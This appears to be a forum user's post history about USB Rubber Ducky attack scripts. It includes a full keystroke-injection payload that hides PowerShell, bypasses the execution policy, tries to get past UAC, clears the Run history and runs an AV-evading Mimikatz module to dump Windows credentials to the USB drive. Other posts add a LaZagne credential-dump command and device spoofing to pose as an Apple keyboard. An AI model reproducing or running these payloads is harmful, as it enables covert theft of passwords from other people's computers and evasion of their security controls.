L07TB0Y
Posts posted by L07TB0Y
-
here is my code
DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTER
issue 1:
THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work
FILES is the name of rubber ducky
lb.ps1 is the customized mimi that does not get detected by AV etc
what am i doing wrong?
-
-
what version of windows 10 are you using? home, enterprise? is it patched?
-
i found it on https://www.ducktoolkit.com/ as well but that does not tell you what to name the file so i named it vidpid.bin and it seems to work
-
check out Darren and Snubs youtube channel that is a wealth of knowledge. In any case if you are lazy you can change the PIV/DIV of the ducky to make it look like an apple keyboard and apple will not ask you to setup the keyboard.
check out the wiki for the rest of your stuff
-
i have twin ducky flashed and i want to keep it but i want to swap my PIV/DIV to Apple keyboard is it possible?
-
On 1/15/2017 at 1:30 PM, rpc72 said:
Starting Windows 8, passwords are no longer stored in memory in the same way that can be reversed.
not true, mimikatz still works in win10, i just tested
-
STRING %DUCKYdrive%\lazagne.exe all
you have to remove drive from the %DUCKYdrive%
to write to usb
STRING %DUCKY%\lazagne.exe all | Out-File '%DUCKY%\%computername%_creds.txt';"
-
so whenever i need to leverage an administrator powershell it prompts me to say OK on UAC. Alt Y does not work. I have even tried left arrow and space bar but what i have found is i need to do Alt Tab and then left arrow and space but there is no Alt Tab in ducky so anyone found a work around that works?
-
well looks like win10 is now blocking scripts, it could be because i am running win 10 enterprise
PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ...
+ ~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
-
On 1/14/2017 at 3:08 PM, henna3 said:
I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as a non-active window. So, when alt+y is being pressed it's not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?
Amazing twin duck payload!
Thanks.
did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so
-
i just got my ducky and i am in the research phase so can any one tell me why do the twin duck when the ducky-decode does the mass storage and multiple payloads etc
-
if you are not good with tech what are you doing with a rubber ducky?
-
why the development on this has stopped? this sounds like a wonderful tool especially the twin duck and multiple payloads
-
New WPA/WPA Attack - Hashcat PMKID
in Hacks & Mods
now can someone port it over to PineApple